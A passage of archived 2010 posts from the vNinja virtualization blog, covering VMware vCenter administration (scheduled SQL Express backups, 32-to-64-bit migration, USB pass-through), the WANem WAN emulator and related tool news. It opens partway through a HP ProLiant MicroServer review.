outlining here, and you can’t really criticize them for that, I just hope that this is just the first of several offerings from HP and that the next version comes with better CPU offerings. A proper CPU would make this baby the perfect entry level, small footprint, low noise branch-office server. Update: Simon Seagrave has posted as “somewhat” more verbose analysis of the HP ProLiant Microserver: New HP Proliant MicroServer – a decent vSphere lab server candidate?. His conclusion is pretty much the same as mine though; give us more CPU and a vSphere supported RAID controller and we’re all set. I couldn’t agree more. --- # Using the WANem WAN Emulator Virtual Appliance URL: https://vNinja.net/network/using-the-wanem-wan-emulator-virtual-appliance/ Date: 2010-08-26 Author: christian Tags: Free Tools, Networking, Ops, Simulation, vCenter, Virtual Appliance, VMware During preparation and preliminary information gathering for a new internal project, I had a need to emulate various networking conditions and scenarios. More specifically I’m looking at the possibility of running the vCenter Client over high latency satellite links, with varying bandwidth availability and even packet loss scenarios. Obviously the best way of testing this, in a controlled environment, is to use some kind of WAN emulator that lets you control the various networking characteristics. WANem is a free WAN emulator and it even comes as a VMware virtual appliance. Setup is pretty straight forward, and I won’t get into the detailed instructions at this point. If someone requests it, perhaps I’ll make a HOWTO post later on. After the WANem Virtual Appliance has been started and setup in your network environment, all you have to do is to route your traffic through it. In my test environment, I decided to route all traffic between my local computer and my vCenter Server through the WANem appliance. Doing so is pretty straight forward; Open up a cmd window, with administrator privileges, on your local computer and use the route command to force traffic through WANem: the command itself is: route add {destination IP} mask 255.255.255.255 {WANem IP} To tune the network properties of the traffic going through WANem, open the WANem admin page in your browser and work some magic. The screenshots below are from the advanced tab: As a simple test, I decided to add 500ms latency (delay time) and a packet loss of 25%, which worked fine. Conclusion # If you need to test out how your applications or networking infrastructure works when issues like latency, jitter and even dropped packets affects your clients, WANem seems like an easy and free route (pun intended) for testing purposes. --- # SolarWinds VM Console URL: https://vNinja.net/virtualization/solarwinds-vm-console/ Date: 2010-08-25 Author: christian Tags: Free Tools, Ops, vCenter, VMware SolarWinds has released a new free vSphere tool called SolarWinds VM Console. Free VM Console Highlights: Bounce (shutdown & restart) VMs without logging into vCenter or vSphere Get end-to-end visibility into your VMware environment—from vCenter through ESX hosts to VM guests Track the real-time up/down status of your VMs from your desktop — without logging into VMware apps Additional VM Monitoring Features: Take a snapshot of your VM prior to shutdown Search on VM names or IP addresses Use your vCenter/vSphere credentials to view a top-down hierarchy of your virtual environment I’m not sure why you as an admin might want to use this tool instead of the vSphere Client, but in environments where you have delegated control over certain VMs (like a test environment etc.) it might be a useful addition to your tool-belt. --- # vCenter Update Manager to lose it's fat URL: https://vNinja.net/virtualization/vcenter-update-manager-to-lose-its-fat/ Date: 2010-08-24 Author: christian Tags: Ops, vCenter, vCenter Update Manager, Virtualization, VMware Player, VMware Workstation Dwayne Lessner who runs IT Blood Pressure, has written a guest post on GestaltIT called Is My Favourite VSphere Tool Is Going Away? In his article, Dwayne talks about vCenter Update Manager 4.1, and the fact that it seems to be the last version of the tools that will allow you to patch your Windows and Linux guests: VMware vCenter Update Manager Features. vCenter Update Manager 4.1 and its subesquent update releases are the last releases to support scanning and remediation of patches for Windows and Linux guest operating systems and applications running inside a virtual machine. The ability to perform virtual machine operations such as upgrade of VMware Tools and virtual machine hardware will continue to be supported and enhanced. VMware vSphere 4.1 release notes Dwayne talks about this as being a bad thing, and that’s where I disagree. I have never understood why VMware saw it as their job to patch the operating systems the guests are running, and I have yet to see anyone actually use this feature. Obviously I was wrong, someone does indeed use it, but I really can’t understand why. I’m a keen believer in doing what you know, and doing it well. Let “native” patching solutions take care of the guests, Windows Server Update Services (WSUS) comes to mind, and leave vCenter Update Manager (VUM) to take care of patching your VMware products. I wouldn’t mind seeing vCenter Update Manager (VUM) extended into patching the VMware Workstation, Fusion and Player installations your enterprise might have, but I really think that losing the fat that is guest OS patching can only be a good thing. --- # vCenter Server 4.1 Performance and Best Practices URL: https://vNinja.net/virtualization/vcenter-server-4-1-performance-and-best-practices/ Date: 2010-08-24 Author: christian Tags: Documentation, Maintenance, Ops, vCenter, VMware, Whitepaper VMware has published a new whitepaper called VMware vCenter Server Performance and Best Practices. This is a must read if you manage a vCenter 4.1 installation, or are currently planning your upgrade. The whitepaper highlights the performance improvements in the latest version, sizing guidelines, best practices and some really good real world information from several case studies. One simple, but probably often overlooked tip, is that the amount of vCenter Clients connected to your vCenter Server has an impact on it’s performance. How many admins consider that when they start up their clients? The whitepaper also comes complete with performance graphs comparing the latest release with the 4.0 release, based on real data from several case studies. If you only read one whitepaper (this week), let it be this one. You will not regret it, I promise. --- # Where in the world is VMware Server? URL: https://vNinja.net/virtualization/where-in-the-world-is-vmware-server/ Date: 2010-08-13 Author: christian Tags: vCenter, Virtualization, VMware, VMware Player, VMware Server, VMware Workstation Over at PlanetVM Wil van Antwerpen posted The Future of VMware Server back in May 2010. Wil makes the argument that it seems like VMware is indeed abandoning VMware Server as a product, leaving us with VMware Workstation and VMware Player as the two Windows installable virtualization solutions from the company. This has caused some reactions, including my own comment, where I question the smartness of abandoning what might just be one of the best virtualization “gateway drugs” VMware has to offer. In my opinion, abandoning VMware Server would be a bad move, but re-reading the documentation from VMware and thinking more about the consequences this might have made me realize something; What if VMware is working on a replacement product or management solution? I seriously doubt VMware would want to abandon the use case that VMware Server has, even if they do indeed abandon the VMware Server product itself. I don’t have any inside knowledge about this, but lets say that VMware is working on a management framework for VMware Player? Something that you can install, in addition to VMware Player, that lets you set auto-start parameters for VMs, let them run headless and remotely manage them? Wouldn’t that pretty much allow us to do the same with VMware Player, that we today use VMware Server for? The more I think about it, the more it makes sense. --- # Using USB Pass-through in vSphere 4.1 URL: https://vNinja.net/virtualization/using-usb-pass-through-in-vsphere-4-1/ Date: 2010-07-22 Author: christian Tags: ESX, Ops, USB, vCenter, Veeam, VMware, vSphere Finally USB pass-through is possible on ESX hosts with the new vSphere 4.1 release! This feature ha been available in VMware Workstation/Fusion and Player for quite a while. The freshly added feature in vSphere 4.1 even works if you vMotion the guest from one host to another, which is in itself pretty amazing functionality! In this post, I’ll show how to setup and use the new USB pass-through feature in vSphere 4.1. Setting up USB pass-through in vSphere 4.1 # First off, we need to add an USB controller to the VM we want the USB pass-through working on. This is done by firing up the vSphere Center Client and right-clicking the VM. Then select Edit Settings Click on Add and find USB Controller from the list then click Next Click Next and you’ll be presented with a list of the currently host-connected available USB devices. If none show up, make sure it’s actually connected to the host. If your device is indeed connected, but still not listed in the vSphere Center Client it’s not supported. In my test setup I have a small APC UPS connected to the host, so I’ll add that to the VM. Also note that this is where you enable vMotion support! Find your device, and click on Next Review your changes and click on Finish This will return you to the Edit Settings window. Click on Ok to have the USB controller and device(s) added to your VM. Connect to your VM and install the drivers, if needed, and you should be able to use your USB device directly inside the VM. Usage Scenarios # What could you possibly use this new feature to accomplish? Well, for one you could use it to connect your UPS to your management software, without having to install any management software on the host itself. In general I would recommend using UPS vendors that offer direct vCenter integration instead, but for a lab environment this should work out nicely. Another obvious usage pattern would be to connect USB dongles that some software require, either for security or for licensing purposes. The one thing that springs to my mind, and one that would probably be the most useful in my environment, is to connect USB HDDs to the host and use those as a backup target for Veeam Backup and Recovery. Being able to directly connect some cheap storage to the host and then connecting it directly into the Veeam Backup and Recovery VM makes it easy to backup/replicate your VMs for manual off-site storage. Kendrick Coleman (kendrickcoleman.com) had the same idea, but unlike him I’ll try to make sure my HDDs are located off-site before the fire starts! :-) I’m sure that there are other usage scenarios as well, like connecting scanners, cameras and whatnot, I’m just not sure I’d like all sorts of devices connected to my hosts. --- # Scheduling vCenter Backups URL: https://vNinja.net/virtualization/scheduling-vcenter-backups/ Date: 2010-07-22 Author: christian Tags: Backup, Ops, SQL Server Express, vCenter, VMware If you run your vCenter on SQL Server Express 2005, you are missing the ability to set up scheduled backup jobs with SQL Maintenance Plans, a feature available in the full version of SQL Server. This might not be a problem if your backup software has SQL Server agents that you use to backup your vCenter databaser, but in smaller environments or even in your lab, you might not have that kind of backup scheme available to you, so what do you do? Thankfully there are ways of setting up the same kind of scheduled backups in SQL Server Express, without being a SQL Server Guru. Creating a Backup Script # If you don’t have SQL Server Management Studio Express installed already, download and install it now. Fire it up and log on with a user that has sufficient permissions to access the vCenter database Find your vCenter database by expanding Databases and select VIM_VCDB Right click on VIM_VCDB and select Tasks and then Back Up… This opens the Back Up Database window, where you set your backup options. Set your options in a manner that fits your environment. You can set options like the backup file location, retention policy etc. So far, this is all fine and dandy. You can create a manual backup this way, without much hassle. How can we turn that into a scheduled job? The first bit is to turn your backup options into a SQL script that can be scheduled. You do this by finding the Script drop-down menu on the top of the Backup Database window. Select Script Action to New Query Window. This opens the script window, where you can see the script and test it to make sure it works as intended. The next step is to save the generated script, you do so my going to File and select Save … As. I’ve created a folder called _c:\scripts_ that I use to store my SQL scripts in, so I’ll save the backup script there as FullBackupVCDB.sql. Scheduling the Backup Script # Now that we have a working backup script, we need to be able to schedule it to run. As we can’t do that within the SQL Server Management Studio Express application, we need to find another way of scheduling it. Windows Server 2008 R2 (and other versions) include a scheduling tool, and that’s what we’ll use to create our schedule. On my standard vCenter installation, the SQL Server is installed in the default location of _C:\Program Files (x86)\Microsoft SQL Server_. This means that the actual command we need to schedule will be (be sure to replace the server-/instance-name and script name if your values differ from mine): “C:\Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE” -S [servername]\SQLEXP_VIM -i c:\scripts\FullBackupVCDB.sql_ Go to the Control Panel and select Schedule Tasks. Click Create Basic Task, give it a name and set an appropriate schedule. Select Start a program as the action for the task, and when it asks for Program/Script enter “C:\Program Files (x86)\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE” -S [servername]\SQLEXP_VIM -i c:\scripts\FullBackupVCDB.sql. Click next and check the box that says Open the Properties dialog for this task when I click Finish then click Finish. In the VCDB Backup properties, make sure the Run whether user is logged on or not option is selected, to make sure the schedule runs as planned. Once you have verified that the schedule works as intended, make sure that you include the location for your vCenter database in your regular backup scheme, and you should we a lot safer than you were. That’s it! Scheduled vCenter backups on SQL Server Express 2005. Thanks to Chris Dearden over at J.F.V.I who helped me out with getting my sqlcmd.exe syntax corrected for the scheduled task! --- # Migrating your vCenter from 32bit to 64bit URL: https://vNinja.net/virtualization/migrating-your-vcenter-from-32bit-to-64bit/ Date: 2010-07-21 Author: christian Tags: Maintenance, Ops, Upgrade, vCenter, VMware As you may or may not know, the new vCenter 4.1 requires that the host it runs on is 64 bit. As 4.0 and previous versions weren’t supported on 64 bit at all, this probably means that when you upgrade you will need to move your existing database to a new host. There are several ways of doing the migration, but one way is to backup your existing database, and restore it on a new host and point the new vCenter 4.1 installation to the existing database and have it upgrade it for you during install. I’m sure that you would like to automate that process, just to limit the possibility of manual screw ups, right? Thankfully, VMware had the same idea. In chapter 5 of the vSphere Upgrade Guide, VMware outlines the different methods you can use when migrating your vCenter database, and on page 39 a data migration tool makes it’s appearance. This two step process takes a backup of your existing vCenter SQL Server Express database and dumps it to a predefined local folder. You then copy the entire migration tool folder to the new host and run the second part of the tool to install vCenter 4.1 and import the old database. I used this tool to migrate our setup, from Windows Server 2003 32bit to Windows Server 2008 R2 64bit without problems. The only thing you need to be aware of is that VMware Update Manager is still a 32bit application and requires that you manually create a 32bit DSN to the database. This is mentioned in the VUM Installation and Administration Guide, but it is not mentioned in the vSphere Upgrade Guide. All in all, this tool is a great assistant for all of you that need to migrate to a new host for 64bit support in vCenter Server 4.1. While it could be more polished, brand a GUI and let you use network storage for the backups, it does the job at hand very well. After all, who needs a polished GUI based application for a one off job like this? Related VMware Knowledgebase Articles # vSphere 4.1 upgrade pre-installation requirements and considerations Migrating an existing vCenter Server database to 4.1 using the data migration tool vCenter Server 4.1 Data Migration Tool fails with the error: HResult 0x2, Level 16, State 1 Using the Data Migration Tool to upgrade from vCenter Server 4.0 to vCenter Server 4.1 fails --- # Welcome to vNinja! URL: https://vNinja.net/news/welcome-to-vninja/ Date: 2010-07-21 Author: christian Tags: Welcome to my new playground. I used to post quite a lot over at my old site, h0bbel.p0ggel.org but given it’s weird domain name and it’s long history I’ve decided to start fresh. This new site will be dedicated to all things virtualization, PowerShell, Windows Server management and possibly even some Citrix products thrown in here and there. I might even go on about APP-V, but that remains to be seen. My main focus will be solutions for SMB users. There is a lot of information out there, but lots of it are focused on large corporations that have large IT teams. Sadly that’s not the reality for many of us, and we have to fill lots of different roles (e.g server admin, network admin, storage admin, etc). For now, there isn’t a whole lot of content here but it’ll start trickling in as soon as I have new content to share. If you have any topics or ideas for posts I should do, please do not hesitate to leave a comment. ---